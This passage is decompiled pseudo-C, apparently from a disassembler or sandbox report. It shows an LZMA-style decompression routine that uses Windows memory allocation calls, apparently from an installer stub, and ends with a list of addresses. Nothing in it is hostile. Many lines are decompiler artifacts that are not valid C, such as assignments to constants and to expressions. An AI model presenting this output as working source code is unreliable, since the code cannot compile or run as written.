						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M00406A77))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8)); // executed
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							L68:
							__esi =  *(__ebp - 0x58);
							 *(__ebp - 0x84) = 0x12;
							goto L132;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							goto L55;
						case 0x1b:
							L75:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1b;
								goto L170;
							}
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							__eflags = __eax -  *(__ebp - 0x74);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
								__eflags = __eax;
							}
							__edx =  *(__ebp - 8);
							__cl =  *(__eax + __edx);
							__eax =  *(__ebp - 0x14);
							 *(__ebp - 0x5c) = __cl;
							 *(__eax + __edx) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t274 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t274;
							__eax =  *(__ebp - 0x68);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							_t283 = __ebp - 0x64;
							 *_t283 =  *(__ebp - 0x64) - 1;
							__eflags =  *_t283;
							 *( *(__ebp - 0x68)) = __cl;
							goto L79;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = __edx;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                                                  0x00000000
                                                  0x004061d4
                                                  0x004061d4
                                                  0x004061d9
                                                  0x00406250
                                                  0x00406257
                                                  0x00406261
                                                  0x00406840
                                                  0x00406840
                                                  0x00406843
                                                  0x00406843
